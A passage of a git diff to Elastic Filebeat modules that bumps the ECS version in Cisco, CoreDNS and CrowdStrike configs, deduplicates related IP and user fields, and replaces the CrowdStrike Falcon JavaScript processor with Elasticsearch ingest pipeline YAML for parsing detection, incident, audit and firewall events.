@@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -242,7 +239,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/ftd/config/input.yml b/x-pack/filebeat/module/cisco/ftd/config/input.yml index 8a3ec3e9ab45..ebf27d1b115a 100644 --- a/x-pack/filebeat/module/cisco/ftd/config/input.yml +++ b/x-pack/filebeat/module/cisco/ftd/config/input.yml @@ -22,7 +22,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json index 72b115c6975b..cbb36cb61856 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json @@ -98,7 +98,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -146,7 +145,6 @@ "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -201,7 +199,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -247,7 +244,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/ios/config/input.yml b/x-pack/filebeat/module/cisco/ios/config/input.yml index 9c69edf8d11c..52431a661831 100644 --- a/x-pack/filebeat/module/cisco/ios/config/input.yml +++ b/x-pack/filebeat/module/cisco/ios/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: cisco_ios diff --git a/x-pack/filebeat/module/cisco/meraki/config/input.yml b/x-pack/filebeat/module/cisco/meraki/config/input.yml index 8f635db379e7..fe55241042b0 100644 --- a/x-pack/filebeat/module/cisco/meraki/config/input.yml +++ b/x-pack/filebeat/module/cisco/meraki/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cisco/nexus/config/input.yml b/x-pack/filebeat/module/cisco/nexus/config/input.yml index a685316e6399..b17aa083854a 100644 --- a/x-pack/filebeat/module/cisco/nexus/config/input.yml +++ b/x-pack/filebeat/module/cisco/nexus/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index 581691ebcf91..b76b7a69a20b 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml @@ -1613,14 +1613,27 @@ processors: field: related.ip value: "{{source.ip}}" if: "ctx?.source?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null" + if: "ctx?.user?.name != null && ctx?.user?.name != ''" + allow_duplicates: false + - append: + field: related.user + value: "{{host.user.name}}" + if: ctx?.host?.user?.name != null && ctx?.host?.user?.name != '' + allow_duplicates: false + - append: + field: related.user + value: "{{source.user.name}}" + if: ctx?.source?.user?.name != null && ctx?.source?.user?.name != '' + allow_duplicates: false - append: field: related.user value: "{{destination.user.name}}" @@ -1630,6 +1643,7 @@ processors: field: related.hash value: "{{file.hash.sha256}}" if: "ctx?.file?.hash?.sha256 != null" + allow_duplicates: false - append: field: related.hosts value: "{{host.hostname}}" diff --git a/x-pack/filebeat/module/cisco/umbrella/config/input.yml b/x-pack/filebeat/module/cisco/umbrella/config/input.yml index d4b26c49ce8a..d2da78cc349a 100644 --- a/x-pack/filebeat/module/cisco/umbrella/config/input.yml +++ b/x-pack/filebeat/module/cisco/umbrella/config/input.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/coredns/log/config/coredns.yml b/x-pack/filebeat/module/coredns/log/config/coredns.yml index 8c4509eb2270..162208f2e80a 100644 --- a/x-pack/filebeat/module/coredns/log/config/coredns.yml +++ b/x-pack/filebeat/module/coredns/log/config/coredns.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml index e70201cb1744..de7c32e3d3b6 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml @@ -16,11 +16,18 @@ tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: -- script: - lang: javascript - id: crowdstrike_falcon - file: ${path.home}/module/crowdstrike/falcon/config/pipeline.js +- decode_json_fields: + fields: + - message + target: crowdstrike + process_array: true + max_depth: 8 +- drop_fields: + fields: + - message + - host.name + ignore_missing: true - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js b/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js deleted file mode 100644 index 46bbf671518e..000000000000 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js +++ /dev/null @@ -1,474 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -var crowdstrikeFalconProcessor = (function () { - var processor = require("processor"); - - // conversion helpers - function convertUnderscore(text) { - return text.split(/(?=[A-Z])/).join('_').toLowerCase(); - } - - function convertToMSEpoch(evt, field) { - var timestamp = evt.Get(field); - if (timestamp == 0) { - evt.Delete(field) - return - } - if (timestamp) { - if (timestamp < 100000000000) { // check if we have a seconds timestamp, this is roughly 1973 in MS - evt.Put(field, timestamp * 1000); - } - (new processor.Timestamp({ - field: field, - target_field: field, - timezone: "UTC", - layouts: ["UNIX_MS"] - })).Run(evt); - } - } - - function convertProcess(evt) { - var commandLine = evt.Get("crowdstrike.event.CommandLine") - if (commandLine && commandLine.trim() !== "") { - var args = commandLine.split(' ').filter(function (arg) { - return arg !== ""; - }); - var executable = args[0] - - evt.Put("process.command_line", commandLine) - evt.Put("process.args", args) - evt.Put("process.executable", executable) - } - } - - function convertSourceDestination(evt) { - var localAddress = evt.Get("crowdstrike.event.LocalAddress"); - var localPort = evt.Get("crowdstrike.event.LocalPort"); - var remoteAddress = evt.Get("crowdstrike.event.RemoteAddress"); - var remotePort = evt.Get("crowdstrike.event.RemotePort"); - if (evt.Get("crowdstrike.event.ConnectionDirection") === "1") { - evt.Put("network.direction", "ingress") - evt.Put("source.ip", remoteAddress) - evt.Put("source.port", remotePort) - evt.Put("destination.ip", localAddress) - evt.Put("destination.port", localPort) - } else { - evt.Put("network.direction", "egress") - evt.Put("destination.ip", remoteAddress) - evt.Put("destination.port", remotePort) - evt.Put("source.ip", localAddress) - evt.Put("source.port", localPort) - } - evt.AppendTo("related.ip", remoteAddress) - evt.AppendTo("related.ip", localAddress) - } - - function convertEventAction(evt) { - evt.Put("event.action", convertUnderscore(evt.Get("crowdstrike.metadata.eventType"))) - } - - function convertUsername(evt) { - var username = evt.Get("crowdstrike.event.UserName") - if (!username || username === "") { - username = evt.Get("crowdstrike.event.UserId") - } - if (username && username !== "") { - evt.Put("user.name", username) - if (username.split('@').length == 2) { - evt.Put("user.email", username) - } - evt.AppendTo("related.user", username) - } - } - - // event processors by type - var eventProcessors = { - DetectionSummaryEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "alert", - "event.category": ["malware"], - "event.type": ["info"], - "event.dataset": "crowdstrike.falcon_endpoint", - "agent.type": "falcon", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.LocalIP", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.LocalIP", - to: "related.ip", - type: "ip" - }, { - from: "crowdstrike.event.ProcessId", - to: "process.pid", - type: "long" - }, { - from: "crowdstrike.event.ParentImageFileName", - to: "process.parent.executable" - }, { - from: "crowdstrike.event.ParentCommandLine", - to: "process.parent.command_line" - }, { - from: "crowdstrike.event.PatternDispositionDescription", - to: "event.action", - }, { - from: "crowdstrike.event.FalconHostLink", - to: "event.url", - }, { - from: "crowdstrike.event.Severity", - to: "event.severity", - }, { - from: "crowdstrike.event.DetectDescription", - to: "message", - }, { - from: "crowdstrike.event.FileName", - to: "process.name", - }, { - from: "crowdstrike.event.UserName", - to: "user.name", - }, - { - from: "crowdstrike.event.MachineDomain", - to: "user.domain", - }, - { - from: "crowdstrike.event.SensorId", - to: "agent.id", - }, - { - from: "crowdstrike.event.ComputerName", - to: "host.name", - }, - { - from: "crowdstrike.event.SHA256String", - to: "file.hash.sha256", - }, - { - from: "crowdstrike.event.MD5String", - to: "file.hash.md5", - }, - { - from: "crowdstrike.event.SHA1String", - to: "file.hash.sha1", - }, - { - from: "crowdstrike.event.DetectName", - to: "rule.name", - }, - { - from: "crowdstrike.event.DetectDescription", - to: "rule.description", - } - ], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - var tactic = evt.Get("crowdstrike.event.Tactic").toLowerCase() - var technique = evt.Get("crowdstrike.event.Technique").toLowerCase() - evt.Put("threat.technique.name", technique) - evt.Put("threat.tactic.name", tactic) - convertProcess(evt) - }) - .Build(), - - IncidentSummaryEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "alert", - "event.category": ["malware"], - "event.type": ["info"], - "event.action": "incident", - "event.dataset": "crowdstrike.falcon_endpoint", - "agent.type": "falcon", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.FalconHostLink", - to: "event.url", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("message", "Incident score " + evt.Get("crowdstrike.event.FineScore")) - convertProcess(evt) - }) - .Build(), - - UserActivityAuditEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["iam"], - type: ["change"], - dataset: "crowdstrike.falcon_audit", - }, - target: "event", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.OperationName", - to: "message", - }, { - from: "crowdstrike.event.UserIp", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.UserIp", - to: "related.ip", - type: "ip" - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - - AuthActivityAuditEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["authentication"], - type: ["change"], - dataset: "crowdstrike.falcon_audit", - }, - target: "event", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.ServiceName", - to: "message", - }, { - from: "crowdstrike.event.UserIp", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.UserIp", - to: "related.ip", - type: "ip" - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("event.action", convertUnderscore(evt.Get("crowdstrike.event.OperationName"))) - convertUsername(evt) - }) - .Build(), - - FirewallMatchEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["network"], - type: ["start", "connection"], - outcome: ["unknown"], - dataset: "crowdstrike.falcon_endpoint", - }, - target: "event", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.Ipv", - to: "network.type", - }, { - from: "crowdstrike.event.PID", - to: "process.pid", - type: "long" - }, - { - from: "crowdstrike.event.RuleId", - to: "rule.id" - }, - { - from: "crowdstrike.event.RuleName", - to: "rule.name" - }, - { - from: "crowdstrike.event.RuleGroupName", - to: "rule.ruleset" - }, - { - from: "crowdstrike.event.RuleDescription", - to: "rule.description" - }, - { - from: "crowdstrike.event.RuleFamilyID", - to: "rule.category" - }, - { - from: "crowdstrike.event.HostName", - to: "host.name" - }, - { - from: "crowdstrike.event.Ipv", - to: "network.type", - }, - { - from: "crowdstrike.event.EventType", - to: "event.code", - } - ], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("message", "Firewall Rule '" + evt.Get("crowdstrike.event.RuleName") + "' triggered") - convertEventAction(evt) - convertProcess(evt) - convertSourceDestination(evt) - }) - .Build(), - - RemoteResponseSessionStartEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "event", - "event.type": ["start"], - "event.dataset": "crowdstrike.falcon_audit", - message: "Remote response session started", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.HostnameField", - to: "host.name", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - - RemoteResponseSessionEndEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "event", - "event.type": ["end"], - "event.dataset": "crowdstrike.falcon_audit", - message: "Remote response session ended", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.HostnameField", - to: "host.name", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - } - - // main processor - return new processor.Chain() - .DecodeJSONFields({ - fields: ["message"], - target: "crowdstrike", - process_array: true, - max_depth: 8 - }) - .Add(function (evt) { - evt.Delete("message"); - evt.Delete("host.name"); - - convertToMSEpoch(evt, "crowdstrike.event.ProcessStartTime") - convertToMSEpoch(evt, "crowdstrike.event.ProcessEndTime") - convertToMSEpoch(evt, "crowdstrike.event.IncidentStartTime") - convertToMSEpoch(evt, "crowdstrike.event.IncidentEndTime") - convertToMSEpoch(evt, "crowdstrike.event.StartTimestamp") - convertToMSEpoch(evt, "crowdstrike.event.EndTimestamp") - convertToMSEpoch(evt, "crowdstrike.event.UTCTimestamp") - convertToMSEpoch(evt, "crowdstrike.metadata.eventCreationTime") - - var outcome = evt.Get("crowdstrike.event.Success") - if (outcome === true) { - evt.Put("event.outcome", "success") - } else if (outcome === false) { - evt.Put("event.outcome", "failure") - } else { - evt.Put("event.outcome", "unknown") - } - - var eventProcessor = eventProcessors[evt.Get("crowdstrike.metadata.eventType")] - if (eventProcessor) { - eventProcessor.Run(evt) - } - }) - .Convert({ - fields: [{ - from: "crowdstrike.metadata.eventCreationTime", - to: "@timestamp", - }], - mode: "copy", - ignore_missing: false, - fail_on_error: true - }) - .Convert({ - fields: [ - { - from: "crowdstrike.event.LateralMovement", - type: "long", - }, - { - from: "crowdstrike.event.LocalPort", - type: "long", - }, - { - from: "crowdstrike.event.MatchCount", - type: "long", - }, - { - from: "crowdstrike.event.MatchCountSinceLastReport", - type: "long", - }, - { - from: "crowdstrike.event.PID", - type: "long", - }, - { - from: "crowdstrike.event.RemotePort", - type: "long", - }, - { - from: "source.port", - type: "long", - }, - { - from: "destination.port", - type: "long", - } - ], - ignore_missing: true, - fail_on_error: false - }) - .Build() - .Run -})(); - -function process(evt) { - crowdstrikeFalconProcessor(evt); -} diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml new file mode 100644 index 000000000000..c7ba463c7bcc --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml @@ -0,0 +1,34 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [authentication] + - append: + field: event.type + value: [change] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - convert: + field: crowdstrike.event.ServiceName + type: string + target_field: message + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserIp + target_field: source.ip + type: string + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.UserIp != null && ctx?.crowdstrike?.event?.UserIp != "" + - script: + lang: painless + source: | + def regex = /([a-z0-9])([A-Z])/; + def replacement = "$1_$2"; + def action = ctx?.crowdstrike?.event?.OperationName; + if (action == null || action == "") return; + ctx["event.action"] = regex.matcher(action).replaceAll(replacement).toLowerCase(); diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml new file mode 100644 index 000000000000..b721c6df1bf5 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml @@ -0,0 +1,163 @@ +processors: + - set: + field: event.kind + value: alert + - append: + field: event.category + value: [malware] + - append: + field: event.type + value: [info] + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: agent.type + value: falcon + - convert: + field: crowdstrike.event.LocalIP + target_field: source.ip + type: string + ignore_failure: true + ignore_missing: true + if: ctx?.crowdstrike?.event?.LocalIP != null && ctx?.crowdstrike?.event?.LocalIP != "" + - convert: + field: crowdstrike.event.ProcessId + target_field: process.pid + ignore_failure: true + type: long + ignore_missing: true + - convert: + field: crowdstrike.event.ParentImageFileName + target_field: process.parent.executable + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.ParentCommandLine + target_field: process.parent.command_line + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.PatternDispositionDescription + target_field: event.action + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.FalconHostLink + target_field: event.url + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.Severity + target_field: event.severity + type: long + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.DetectDescription + target_field: message + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.FileName + target_field: process.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserName + target_field: user.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.MachineDomain + target_field: user.domain + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.SensorId + target_field: agent.id + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.ComputerName + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.SHA256String + target_field: file.hash.sha256 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha256}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.sha256 != null && ctx?.file?.hash?.sha256 != "" && !(/^0+$/.matcher(ctx.file.hash.sha256).matches()) + - convert: + field: crowdstrike.event.MD5String + target_field: file.hash.md5 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.md5}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.md5 != null && ctx?.file?.hash?.md5 != "" && !(/^0+$/.matcher(ctx.file.hash.md5).matches()) + - convert: + field: crowdstrike.event.SHA1String + target_field: file.hash.sha1 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha1}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.sha1 != null && ctx?.file?.hash?.sha1 != "" && !(/^0+$/.matcher(ctx.file.hash.sha1).matches()) + - convert: + field: crowdstrike.event.DetectName + target_field: rule.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.DetectDescription + target_field: rule.description + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.Technique + target_field: threat.technique.name + type: string + ignore_failure: true + ignore_missing: true + - lowercase: + field: threat.technique.name + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.Tactic + target_field: threat.tactic.name + type: string + ignore_failure: true + ignore_missing: true + - lowercase: + field: threat.tactic.name + ignore_missing: true + ignore_failure: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml new file mode 100644 index 000000000000..5437812dd1c0 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml @@ -0,0 +1,137 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [firewall_match_event] + - append: + field: event.type + value: [start, connection] + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: message + value: "Firewall Rule '{{crowdstrike.event.RuleName}}' triggered" + if: ctx?.crowdstrike?.event?.RuleName != null + ignore_failure: true + - convert: + field: "crowdstrike.event.Ipv" + target_field: "network.type" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.PID" + target_field: "process.pid" + ignore_failure: true + ignore_missing: true + type: "long" + - convert: + field: "crowdstrike.event.RuleId" + target_field: "rule.id" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleName" + target_field: "rule.name" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleGroupName" + target_field: "rule.ruleset" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleDescription" + target_field: "rule.description" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleFamilyID" + target_field: "rule.category" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.HostName" + target_field: "host.name" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.Ipv" + target_field: "network.type" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.EventType" + target_field: "event.code" + type: string + ignore_missing: true + ignore_failure: true + - set: + field: network.direction + value: ingress + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: source.ip + value: "{{crowdstrike.event.RemoteAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - convert: + field: crowdstrike.event.RemotePort + target_field: source.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: destination.ip + value: "{{crowdstrike.event.LocalAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - convert: + field: crowdstrike.event.LocalPort + target_field: destination.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: network.direction + value: ingress + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - set: + field: destination.ip + value: "{{crowdstrike.event.RemoteAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - convert: + field: crowdstrike.event.RemotePort + target_field: destination.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - set: + field: source.ip + value: "{{crowdstrike.event.LocalAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - convert: + field: crowdstrike.event.LocalPort + target_field: source.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml new file mode 100644 index 000000000000..5877ed4f20d2 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml @@ -0,0 +1,29 @@ +processors: + - set: + field: event.kind + value: alert + - append: + field: event.category + value: [malware] + - append: + field: event.type + value: [info] + - set: + field: event.action + value: incident + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: agent.type + value: falcon + - convert: + field: crowdstrike.event.FalconHostLink + target_field: event.url + type: string + ignore_failure: true + ignore_missing: true + - set: + field: message + value: "Incident score {{crowdstrike.event.FineScore}}" + if: ctx?.crowdstrike?.event?.FineScore != null diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml index 3aa632ab7158..7e7efe5cd745 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml @@ -3,6 +3,313 @@ processors: - set: field: event.ingested value: '{{_ingest.timestamp}}' + - date: + field: crowdstrike.event.ProcessStartTime + target_field: crowdstrike.event.ProcessStartTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessStartTime != null && + !(ctx.crowdstrike.event.ProcessStartTime instanceof String) && + ctx.crowdstrike.event.ProcessStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessStartTime) + 1) >= 12 + - date: + field: crowdstrike.event.ProcessEndTime + target_field: crowdstrike.event.ProcessEndTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessEndTime != null && + !(ctx.crowdstrike.event.ProcessEndTime instanceof String) && + ctx.crowdstrike.event.ProcessEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessEndTime) + 1) >= 12 + - date: + field: crowdstrike.event.IncidentStartTime + target_field: crowdstrike.event.IncidentStartTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentStartTime != null && + !(ctx.crowdstrike.event.IncidentStartTime instanceof String) && + ctx.crowdstrike.event.IncidentStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentStartTime) + 1) >= 12 + - date: + field: crowdstrike.event.IncidentEndTime + target_field: crowdstrike.event.IncidentEndTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentEndTime != null && + !(ctx.crowdstrike.event.IncidentEndTime instanceof String) && + ctx.crowdstrike.event.IncidentEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentEndTime) + 1) >= 12 + - date: + field: crowdstrike.event.StartTimestamp + target_field: crowdstrike.event.StartTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.StartTimestamp != null && + !(ctx.crowdstrike.event.StartTimestamp instanceof String) && + ctx.crowdstrike.event.StartTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.StartTimestamp) + 1) >= 12 + - date: + field: crowdstrike.event.EndTimestamp + target_field: crowdstrike.event.EndTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.EndTimestamp != null && + !(ctx.crowdstrike.event.EndTimestamp instanceof String) && + ctx.crowdstrike.event.EndTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.EndTimestamp) + 1) >= 12 + - date: + field: crowdstrike.event.UTCTimestamp + target_field: crowdstrike.event.UTCTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.UTCTimestamp != null && + !(ctx.crowdstrike.event.UTCTimestamp instanceof String) && + ctx.crowdstrike.event.UTCTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.UTCTimestamp) + 1) >= 12 + - date: + field: crowdstrike.metadata.eventCreationTime + target_field: crowdstrike.metadata.eventCreationTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.metadata?.eventCreationTime != null && + !(ctx.crowdstrike.metadata.eventCreationTime instanceof String) && + ctx.crowdstrike.metadata.eventCreationTime != 0 && + (int)(Math.log10(ctx.crowdstrike.metadata.eventCreationTime) + 1) >= 12 + - date: + field: crowdstrike.event.ProcessStartTime + target_field: crowdstrike.event.ProcessStartTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessStartTime != null && + !(ctx.crowdstrike.event.ProcessStartTime instanceof String) && + ctx.crowdstrike.event.ProcessStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessStartTime) + 1) < 12 + - date: + field: crowdstrike.event.ProcessEndTime + target_field: crowdstrike.event.ProcessEndTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessEndTime != null && + !(ctx.crowdstrike.event.ProcessEndTime instanceof String) && + ctx.crowdstrike.event.ProcessEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessEndTime) + 1) < 12 + - date: + field: crowdstrike.event.IncidentStartTime + target_field: crowdstrike.event.IncidentStartTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentStartTime != null && + !(ctx.crowdstrike.event.IncidentStartTime instanceof String) && + ctx.crowdstrike.event.IncidentStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentStartTime) + 1) < 12 + - date: + field: crowdstrike.event.IncidentEndTime + target_field: crowdstrike.event.IncidentEndTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentEndTime != null && + !(ctx.crowdstrike.event.IncidentEndTime instanceof String) && + ctx.crowdstrike.event.IncidentEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentEndTime) + 1) < 12 + - date: + field: 